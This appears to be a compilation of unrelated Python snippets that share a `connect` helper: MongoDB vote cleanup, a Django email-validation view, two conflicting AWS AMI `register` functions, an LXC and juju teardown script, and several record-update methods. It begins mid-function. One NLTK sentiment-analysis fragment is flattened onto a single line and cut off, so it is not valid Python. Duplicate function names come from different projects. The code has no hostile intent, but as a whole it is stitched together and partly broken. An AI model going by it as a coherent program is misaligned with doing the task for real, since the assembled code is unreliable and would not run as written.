    return ami_id, name
def remove_fakes():
    """Delete users (and their votes) carrying the known fake fingerprint."""
    count = 0
    for vote in utils.connect('vote').find({}):
        user = utils.connect('user').find_one({"_id": vote['user']})
        if user['fingerprint'] == "2505346121":
            utils.connect('vote').remove({"user": user['_id'],
                                          "session": vote['session']})
            utils.connect('user').remove({"_id": user['_id']})
            count += 1
            print("Removed user %s, vote %s, #%s"
                  % (user['name'], vote['_id'], count))
def email_validate(request, token):
    """Activate the account tied to ``token`` and mark the token as used."""
    cnx = connect()
    if not cnx:
        messages.add_message(
            request, messages.ERROR,
            'Error validando email. Por favor, intenta nuevamente.')
        logger.critical('Unable to connect to Mongo Engine.')
        return redirect('/')
    reg = cnx.reg_token.find_one({'token': token, 'used': False})
    if reg:
        email = reg['email']
        # Burn the token so it cannot be replayed.
        cnx.reg_token.update({'token': token}, {'$set': {'used': True}})
        user = Users.objects.get(email=email)
        user.is_active = 1
        user.save()
        messages.add_message(
            request, messages.SUCCESS,
            'Email validado. ¡Ahora puedes ingresar a Giviu!')
        return redirect('base_login')
    messages.add_message(request, messages.WARNING, 'Solicitud No Válida.')
    return redirect('base_login')
def register(snapshot_id, region, arch, size=None, name=None, desc=None):
    """Register an HVM EBS-backed AMI from ``snapshot_id``.

    Missing size/name default to the snapshot's volume size/description.
    Returns (ami_id, name).
    """
    conn = utils.connect(region)
    if None in (name, size):
        log.debug("getting snapshot - %s", snapshot_id)
        snapshot = conn.get_all_snapshots(snapshot_ids=[snapshot_id])[0]
        size = size if size else snapshot.volume_size
        name = name if name else snapshot.description
    ec2_arch = "x86_64" if arch == "amd64" else arch
    log.debug("creating block_device_map")
    block_device_map = BlockDeviceMapping()
    # Root volume restored from the snapshot, deleted on termination.
    rootfs = BlockDeviceType()
    rootfs.delete_on_termination = True
    rootfs.size = size
    rootfs.snapshot_id = snapshot_id
    rootfs_device_name = "/dev/xvda"
    block_device_map[rootfs_device_name] = rootfs
    # Instance-store scratch volume.
    ephemeral = BlockDeviceType()
    ephemeral.ephemeral_name = "ephemeral0"
    ephemeral_device_name = "/dev/xvdb"
    block_device_map[ephemeral_device_name] = ephemeral
    log.debug("registering image - %s", name)
    ami_id = conn.register_image(
        name=name,
        description=desc,
        architecture=ec2_arch,
        root_device_name=rootfs_device_name,
        block_device_map=block_device_map,
        virtualization_type="hvm",
    )
    log.info("registered image - %s %s %s", ami_id, name, region)
    return ami_id, name
def register(snapshot_id, region, size=None, arch=None, name=None, desc=None):
    """Register a paravirtual AMI from ``snapshot_id`` with a region kernel.

    Missing size/name/desc/arch are derived from the snapshot and its
    image name. Returns the new AMI id.
    """
    conn = utils.connect(region)
    log.debug('getting snapshot - %s', snapshot_id)
    snapshot = conn.get_all_snapshots(snapshot_ids=[snapshot_id])[0]
    size = size if size else snapshot.volume_size
    name = name if name else snapshot.description
    desc = desc if desc else utils.parse_imagename(name)['url']
    arch = arch if arch else utils.parse_imagename(name)['architecture']
    kernel_id = utils.get_kernel(region, arch)
    arch_ec2 = "x86_64" if arch == "amd64" else arch
    log.debug('creating block_device_map')
    # Root volume restored from the snapshot, deleted on termination.
    rootfs = BlockDeviceType()
    rootfs.delete_on_termination = True
    rootfs.size = size
    rootfs.snapshot_id = snapshot_id
    # Instance-store scratch volume.
    ephemeral = BlockDeviceType()
    ephemeral.ephemeral_name = 'ephemeral0'
    block_device_map = BlockDeviceMapping()
    block_device_map['/dev/sda1'] = rootfs
    block_device_map['/dev/sda2'] = ephemeral
    log.debug('registering image - %s', name)
    ami_id = conn.register_image(
        name=name,
        description=desc,
        architecture=arch_ec2,
        kernel_id=kernel_id,
        root_device_name="/dev/sda1",
        block_device_map=block_device_map)
    log.info('registered image - %s %s %s', ami_id, name, region)
    return ami_id
def main():
    """Destroy this environment's LXC containers and their juju machines."""
    logging.basicConfig(level=logging.DEBUG)
    parser = setup_parser()
    options = parser.parse_args()
    env = connect(options.env_name)
    # BUG FIX: check_output returns bytes on Python 3; decode before
    # splitting into container names (a no-op for ASCII on Python 2).
    output = subprocess.check_output(["sudo", "lxc-ls"]).decode()
    containers = output.strip().split("\n")
    containers = [c for c in containers
                  if c.startswith('%s-m' % options.env_name)]
    log.info("Destroy containers %s", " ".join(containers))
    for c in containers:
        subprocess.check_output([
            "sudo", "lxc-destroy", "--force", "-n", c])
    m = env.status()
    # BUG FIX: dict.keys() has no .remove() on Python 3; copy to a list
    # first. Machine '0' is kept (the bootstrap/state machine).
    machines = list(m['Machines'].keys())
    machines.remove('0')
    log.info("Terminating machines in juju %s", " ".join(machines))
    env.destroy_machines(machines, force=True)
def __init__(self, region=None):
    """Bind to ``region`` (default: this instance's region) and connect."""
    self.region = region if region else utils.get_region()
    self.conn = utils.connect(self.region)
    # No volume attached yet.
    self.vol = None
    self.device = None
def __init__(self, zone):
    """Store the hosted zone name and open a Route53 connection."""
    self.zone = zone
    self.conn = utils.connect(boto.route53.Route53Connection)
import re from nltk.classify import NaiveBayesClassifier from nltk.tokenize import TweetTokenizer from nltk.corpus import stopwords from nltk.collocations import BigramCollocationFinder from nltk.metrics import BigramAssocMeasures from nltk.probability import FreqDist, ConditionalFreqDist from utils import Twitter, connect # Define global variable _bestwords, used during feature extraction _bestwords = None # connect to mongo db handle = connect() # Set global variable _bestwords, used during feature extraction def init_bestwords(): print "Defining _bestwords.." global _bestwords _bestwords = get_best_words() def get_best_words(): tokenizer = TweetTokenizer() # Analyze frequencies word_fd = FreqDist() label_word_fd = ConditionalFreqDist()
def update_records(self):
    """Recount this session's votes and persist the total.

    NOTE(review): Cursor.count() is removed in PyMongo 4; this relies on
    the PyMongo 3 API the rest of the project uses.
    """
    vote_collection = utils.connect("vote")
    self.votes = vote_collection.find({"session": self._id}).count()
    self.save()
def commit_to_db(self, collection):
    """Stamp ``updated`` and save this object into ``collection``.

    Returns whatever Collection.save() returns (the stored _id).
    """
    self.updated = time.mktime(datetime.now().timetuple())
    target = utils.connect(collection)
    return target.save(self.to_dict())
def update_records(self):
    """Refresh the cached lists of sessions this user voted for / pitched."""
    vote_coll = utils.connect("vote")
    session_coll = utils.connect("session")
    self.sessions_voted_for = [doc["session"]
                               for doc in vote_coll.find({"user": self._id})]
    self.sessions_pitched = [doc["_id"]
                             for doc in session_coll.find({"user": self._id})]
    self.save()